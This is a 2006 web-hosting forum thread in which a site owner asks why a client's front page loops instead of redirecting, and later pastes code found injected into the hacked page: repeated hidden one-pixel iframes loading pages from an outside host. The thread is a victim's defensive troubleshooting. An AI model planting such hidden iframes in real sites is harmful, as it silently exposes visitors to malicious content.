Strange page forwarding behaviour

Oliy · 23-08-2006, 07:54 PM

Hi all,

The front page to one of my clients' websites is behaving strangely.

The page in question is http://www.kanishkabags.co.uk/ and the behaviour is that it is not fowarding to the shop homepage, which is http://www.kanishkabags.co.uk/shop/agora.cgi, but rather getting stuck in a loop.

It worked fine before, using meta refresh as follows:
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://www.kanishkabags.co.uk/shop/agora.cgi">

The strange behaviour is shown in the status bar of my browser, which displays messages such as "Read hostingprod.com" in between saying "Waiting for kanishkabags.co.uk" or "Transferring data from kanishkabags.co.uk"

Also, according to firefox page info, I have the following media on the page:
http://geo.yahoo.com/serv?s=76001524...358602&f=p9w18
http://geo.yahoo.com/serv?s=76001524...362629&f=p9w15

What on earth is all this about? Do I have spyware on my computer, is the site hacked, or what? The source code, as you can see for yourself, is about 15 lines long and contains none of these references.

Any help would be greatly appreciated

Jacob · 23-08-2006, 08:34 PM

There appears to be some encoded javascript on the page - I would try creating the page with just the meta refresh and nothing else and see if that works.

Regards,

Jacob

Oliy · 23-08-2006, 09:12 PM

Hi Jacob,
Thanks for your reply. Commenting out the javascript works, but it doesn't explain where this reference to prodhosting.com comes from, or those mysterious links to geo.yahoo.com (which is still there, according to my browser at least...)

Oliy · 15-09-2006, 10:05 PM

This code appeared on the front page:

Code:

<body>

<iframe src="http://fl4w.info/ie.php" width="1" height="1" hspace="1" vspace="1"></iframe>

</body>

</html><html>

<body>

<iframe src="http://fl4w.info/ie.php" width="1" height="1" hspace="1" vspace="1"></iframe>

</body>

</html><html>

<body>

<iframe src="http://fl4w.info/maik/index.php" width="1" height="1" hspace="1" vspace="1"></iframe>

</body>

</html><html>

<body>

<iframe src="http://fl4w.info/maik/index.php" width="1" height="1" hspace="1" vspace="1"></iframe>

</body>

The site was definitely hacked. Is there any way you can test the site for vulnerabilities or prevent this happening again? There are no upload scripts apart from the standard agora upload script for images on the website.

Thanks,
Oliy

23-08-2006, 07:54 PM	#1 (permalink)
Oliy Registered User Join Date: Jun 2003 Posts: 29	Strange page forwarding behaviour Hi all, The front page to one of my clients' websites is behaving strangely. The page in question is http://www.kanishkabags.co.uk/ and the behaviour is that it is not fowarding to the shop homepage, which is http://www.kanishkabags.co.uk/shop/agora.cgi, but rather getting stuck in a loop. It worked fine before, using meta refresh as follows: <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://www.kanishkabags.co.uk/shop/agora.cgi"> The strange behaviour is shown in the status bar of my browser, which displays messages such as "Read hostingprod.com" in between saying "Waiting for kanishkabags.co.uk" or "Transferring data from kanishkabags.co.uk" Also, according to firefox page info, I have the following media on the page: http://geo.yahoo.com/serv?s=76001524...358602&f=p9w18 http://geo.yahoo.com/serv?s=76001524...362629&f=p9w15 What on earth is all this about? Do I have spyware on my computer, is the site hacked, or what? The source code, as you can see for yourself, is about 15 lines long and contains none of these references. Any help would be greatly appreciated __________________ Everyone Makes Mistakes I Create Disasters

23-08-2006, 08:34 PM	#2 (permalink)
Jacob Administrator Join Date: May 2003 Posts: 1,299	There appears to be some encoded javascript on the page - I would try creating the page with just the meta refresh and nothing else and see if that works. Regards, Jacob __________________ Jacob Colton jacob@catalyst2.com Open a ticket \| Knowledgebase \| Rate catalyst2 \| Review catalyst2

23-08-2006, 09:12 PM	#3 (permalink)
Oliy Registered User Join Date: Jun 2003 Posts: 29	Hi Jacob, Thanks for your reply. Commenting out the javascript works, but it doesn't explain where this reference to prodhosting.com comes from, or those mysterious links to geo.yahoo.com (which is still there, according to my browser at least...) __________________ Everyone Makes Mistakes I Create Disasters

Thread Tools
Show Printable Version Email this Page
Display Modes	Rate This Thread
Linear Mode Switch to Hybrid Mode Switch to Threaded Mode	Rate This Thread: